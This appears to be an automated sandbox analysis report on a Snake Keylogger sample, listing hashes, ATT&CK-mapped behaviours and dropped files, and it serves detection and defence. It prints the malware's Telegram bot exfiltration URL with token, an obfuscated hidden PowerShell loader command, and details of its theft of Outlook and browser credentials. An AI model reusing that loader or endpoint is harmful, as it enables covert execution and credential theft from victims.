Analysis
-
max time kernel
298s -
max time network
274s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-10-2024 16:16
Static task
static1
Behavioral task
behavioral1
Sample
SEM2024000002383.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
SEM2024000002383.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Synligstes84.ps1
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Synligstes84.ps1
Resource
win10v2004-20241007-en
General
-
Target
SEM2024000002383.exe
-
Size
748KB
-
MD5
06fa51d68f2545f28a2b942b01a4bb13
-
SHA1
74fb1ce042c1982155d6d190b446dd429c7ad463
-
SHA256
fb79dfe6e2eebbe7882d3e688ff377c3ffcfc8d41f35e1af16f224846f4fab5b
-
SHA512
a11d5b3fccfc2cf03913903382b2521b609bd2d798d50e6b151c8a88f1cb835456e0f1ace18c50037de6b93c656f51b88e783fb42b80b38fd3be0d772cc5c773
-
SSDEEP
12288:jG6QMVyGP0Fx53cAA0jGnheowOyGOs61IYZVAecgs9FMa1Mdq8jJM:jG6QtGP0OhsGnheowDGMIYO7MoOM
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot7840943707:AAFvjApaxzyzfiy9tTVH4n-N6k-rIeMo504/sendMessage?chat_id=2129508827
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 2 IoCs
resource yara_rule behavioral2/memory/3960-134-0x0000000000470000-0x00000000016C4000-memory.dmp family_snakekeylogger behavioral2/memory/3960-136-0x0000000000470000-0x0000000000496000-memory.dmp family_snakekeylogger -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1628 powershell.exe 3820 powershell.exe -
Loads dropped DLL 2 IoCs
pid Process 212 sparekassebestyrere.exe 3960 sparekassebestyrere.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sparekassebestyrere.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sparekassebestyrere.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sparekassebestyrere.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sparekassebestyrere.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sparekassebestyrere.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sparekassebestyrere.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 34 drive.google.com 35 drive.google.com 36 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 61 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 3960 sparekassebestyrere.exe 212 sparekassebestyrere.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 3820 powershell.exe 1628 powershell.exe 3960 sparekassebestyrere.exe 212 sparekassebestyrere.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\resources\0409\Grubstaking.bro SEM2024000002383.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SEM2024000002383.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sparekassebestyrere.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sparekassebestyrere.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
pid Process 3820 powershell.exe 1628 powershell.exe 3820 powershell.exe 1628 powershell.exe 1628 powershell.exe 1628 powershell.exe 1628 powershell.exe 3820 powershell.exe 3820 powershell.exe 3820 powershell.exe 1628 powershell.exe 1628 powershell.exe 1628 powershell.exe 3820 powershell.exe 3820 powershell.exe 3820 powershell.exe 1628 powershell.exe 3820 powershell.exe 3960 sparekassebestyrere.exe 212 sparekassebestyrere.exe 3960 sparekassebestyrere.exe 212 sparekassebestyrere.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 3820 powershell.exe 1628 powershell.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
description pid Process Token: SeDebugPrivilege 1628 powershell.exe Token: SeDebugPrivilege 3820 powershell.exe Token: SeIncreaseQuotaPrivilege 1628 powershell.exe Token: SeSecurityPrivilege 1628 powershell.exe Token: SeTakeOwnershipPrivilege 1628 powershell.exe Token: SeLoadDriverPrivilege 1628 powershell.exe Token: SeSystemProfilePrivilege 1628 powershell.exe Token: SeSystemtimePrivilege 1628 powershell.exe Token: SeProfSingleProcessPrivilege 1628 powershell.exe Token: SeIncBasePriorityPrivilege 1628 powershell.exe Token: SeCreatePagefilePrivilege 1628 powershell.exe Token: SeBackupPrivilege 1628 powershell.exe Token: SeRestorePrivilege 1628 powershell.exe Token: SeShutdownPrivilege 1628 powershell.exe Token: SeDebugPrivilege 1628 powershell.exe Token: SeSystemEnvironmentPrivilege 1628 powershell.exe Token: SeRemoteShutdownPrivilege 1628 powershell.exe Token: SeUndockPrivilege 1628 powershell.exe Token: SeManageVolumePrivilege 1628 powershell.exe Token: 33 1628 powershell.exe Token: 34 1628 powershell.exe Token: 35 1628 powershell.exe Token: 36 1628 powershell.exe Token: SeIncreaseQuotaPrivilege 3820 powershell.exe Token: SeSecurityPrivilege 3820 powershell.exe Token: SeTakeOwnershipPrivilege 3820 powershell.exe Token: SeLoadDriverPrivilege 3820 powershell.exe Token: SeSystemProfilePrivilege 3820 powershell.exe Token: SeSystemtimePrivilege 3820 powershell.exe Token: SeProfSingleProcessPrivilege 3820 powershell.exe Token: SeIncBasePriorityPrivilege 3820 powershell.exe Token: SeCreatePagefilePrivilege 3820 powershell.exe Token: SeBackupPrivilege 3820 powershell.exe Token: SeRestorePrivilege 3820 powershell.exe Token: SeShutdownPrivilege 3820 powershell.exe Token: SeDebugPrivilege 3820 powershell.exe Token: SeSystemEnvironmentPrivilege 3820 powershell.exe Token: SeRemoteShutdownPrivilege 3820 powershell.exe Token: SeUndockPrivilege 3820 powershell.exe Token: SeManageVolumePrivilege 3820 powershell.exe Token: 33 3820 powershell.exe Token: 34 3820 powershell.exe Token: 35 3820 powershell.exe Token: 36 3820 powershell.exe Token: SeDebugPrivilege 3960 sparekassebestyrere.exe Token: SeDebugPrivilege 212 sparekassebestyrere.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 5080 wrote to memory of 1628 5080 SEM2024000002383.exe 84 PID 5080 wrote to memory of 1628 5080 SEM2024000002383.exe 84 PID 5080 wrote to memory of 1628 5080 SEM2024000002383.exe 84 PID 5080 wrote to memory of 3820 5080 SEM2024000002383.exe 86 PID 5080 wrote to memory of 3820 5080 SEM2024000002383.exe 86 PID 5080 wrote to memory of 3820 5080 SEM2024000002383.exe 86 PID 3820 wrote to memory of 212 3820 powershell.exe 97 PID 3820 wrote to memory of 212 3820 powershell.exe 97 PID 3820 wrote to memory of 212 3820 powershell.exe 97 PID 3820 wrote to memory of 212 3820 powershell.exe 97 PID 1628 wrote to memory of 3960 1628 powershell.exe 98 PID 1628 wrote to memory of 3960 1628 powershell.exe 98 PID 1628 wrote to memory of 3960 1628 powershell.exe 98 PID 1628 wrote to memory of 3960 1628 powershell.exe 98 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sparekassebestyrere.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sparekassebestyrere.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\SEM2024000002383.exe"C:\Users\Admin\AppData\Local\Temp\SEM2024000002383.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Woodwaxen=Get-Content -raw 'C:\Users\Admin\AppData\Local\Temp\superincomprehensible\Synligstes84.Hig';$Fragtvogne=$Woodwaxen.SubString(6209,3);.$Fragtvogne($Woodwaxen)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Users\Admin\AppData\Local\Temp\sparekassebestyrere.exe"C:\Users\Admin\AppData\Local\Temp\sparekassebestyrere.exe"3⤵
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3960
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Woodwaxen=Get-Content -raw 'C:\Users\Admin\AppData\Local\Temp\superincomprehensible\Synligstes84.Hig';$Fragtvogne=$Woodwaxen.SubString(6209,3);.$Fragtvogne($Woodwaxen)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3820 -
C:\Users\Admin\AppData\Local\Temp\sparekassebestyrere.exe"C:\Users\Admin\AppData\Local\Temp\sparekassebestyrere.exe"3⤵
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:212
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
854B
MD5e935bc5762068caf3e24a2683b1b8a88
SHA182b70eb774c0756837fe8d7acbfeec05ecbf5463
SHA256a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d
SHA512bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD543832069d8f03a5d73dc278fae3b35ea
SHA1ff26203bf08efd341b9b7af5a691e6f3abd84822
SHA2561e471a8afb34a6896632c7930b04f0aa6771aece3c7c97e270da8ab55970fb6f
SHA512c66445de1b855578da64212bcd649fdfe0ab3ce43c6635614779f1ca656cb732458eac03e6a3119cb6aa3728ca85b791da68f1a9a2ab4b33b338f7bd89f7b194
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize471B
MD555dd21411f214fc63eeacc240a6e8b61
SHA111374ef319aa8627dd65619e6e6f4886c6124bb7
SHA2566b82653fabdf71adbeb51838b98136533d47c77991d73da6318d4fae61f0b0f5
SHA512d6f585d48b85a45588f7ad4b24e0fe2a5894ea395b593fb9bb1f50644f3857bd25f8ba4b2aa370b9ed9e568b7bf6dce115cb9577ede452a9a8548d656cca55a5
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
Filesize472B
MD5bac80766bb58bd773b103a4901553ec8
SHA1a70d9baf9bad99c2dc5b7c2651a7c37e676ff6b5
SHA2568df55918cdbd2a47e6e3d059a8d81619347b7d251bf30cf93ad73820e3a9e6ea
SHA51291796008239d01776728ac888f35a8cf9d85ff0d4c5e848b0dfba8b2be914b7c92378c9bf3928fc325dc7bcb46ebcf492deaf7776aee3421e5abf7acdebdc060
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
Filesize170B
MD54b43cae227f8e3ef564abc2a95355d78
SHA18f5e711746c2d9b19a0e774b86b9f8ec29322b03
SHA25698fdf444c3b172fe6d88c6b800e65b75f7d9310b00bdf78e5e04606962b511b3
SHA512adfd5b82316e2a483f510b361f76a8544b88a31ca7c0f46df8b0a7a22a8a20dffd59d8b57561d014d0300f5b5e11bd0ca47325264c6c3efc6081ea5bfa4085c5
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD58a2a8390dd922844bae71c0cb0ee41cf
SHA196fe13a511e321fa98ab4ed959239f132b7c59eb
SHA2565bffb8531b3f8acac71370d57c1c7cd9861ade37bec98d51f70eda9254a2437b
SHA5126ddad4821427c77c08aada55928e7ce8d4639376afaef9e0995a8e7a6b3d95215d4e401e3d3b694ae03f6cb9fcf303f60127b58ff52f8dc6c472b13ea7a371ca
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize406B
MD56f2b262117319a118c349ca27f9df68c
SHA1d5137693b1b330dcac62f4f0ef915eaaac62e708
SHA256416659123759ffe9f2758a92f612839732fde56f429b2595a1547bd2ae903a32
SHA512af868e026ed2ddc02889db0d128baf1e7a8a4fc993914fa045b2da6135be3c9a3cf503d43fbf059c67bb39879076405b9999c9de7226a0bd3da7165dd2299355
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize406B
MD5e80795b255a395eb46d2573798c6d3a2
SHA1f7585628d63ae6bdc3f7fa9a9b27389d77de50f6
SHA25699fee4cbfec745331c2937cece469a12aa0810423113acda3d290c5c15e55c76
SHA5127a470959a85635fdc8f67efa89e95aca8ee130e9427aefef7c9d5da4b1d699a4c8bfb4135b27fa11f1c63eceb74e87a154e7492278eed7cd4c4eb5ca2b1bbe7d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
Filesize402B
MD5f2330b5a53480eab2213d1223e54ce0b
SHA12de076fb51dcb8b2d8241f5fd1c4cc19c48dd860
SHA256d302186c873c733dbcef74cb94909d3968f0e28ff14468a3ae2c0304add94b11
SHA512d6a3a7e4b43ad4067345cdc7a6e6516e768e0d3e19cfd8bb9178b31b65b7cf02ab59231c7e1cc005d7e2b4929242bd10f59f4113567d2fbff245de48a69ddc74
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
748KB
MD506fa51d68f2545f28a2b942b01a4bb13
SHA174fb1ce042c1982155d6d190b446dd429c7ad463
SHA256fb79dfe6e2eebbe7882d3e688ff377c3ffcfc8d41f35e1af16f224846f4fab5b
SHA512a11d5b3fccfc2cf03913903382b2521b609bd2d798d50e6b151c8a88f1cb835456e0f1ace18c50037de6b93c656f51b88e783fb42b80b38fd3be0d772cc5c773
-
Filesize
306KB
MD5e722a2a3f5a340e2b87e12ec6a1f33a5
SHA1b0c047440e053e3ec01d6d94cc1f21663294dd27
SHA2564c2064e7a4e41fe147b87eb6e298bb93133b9b2334d143a1b18ec5758ac487fc
SHA512a8359b0abc35dd980cda9a117ed85bc622df00ad827c0afa7c185270869404fbcc4e43c8640b1c5aee1f4048c100d375372bbc80410fecf747f2717ff266a26a
-
Filesize
53KB
MD5453a8e6a5068ae5a2e5d99de31a13b3b
SHA19f202a5b9a8cf1ae90030e14ea99c4e787338ede
SHA2564ac6b7ddcc88b43191a8e1329e632c3246b10dcd077b1e79efa2f0559cafa7f6
SHA51237b6296b2434b1791d7e709d17cd8bcce6d8111505648b63227e1004461de31d07922497ed80be4e6ab115ece2964394cf6a3c1b26725a3da2fa0bb3cf7cac46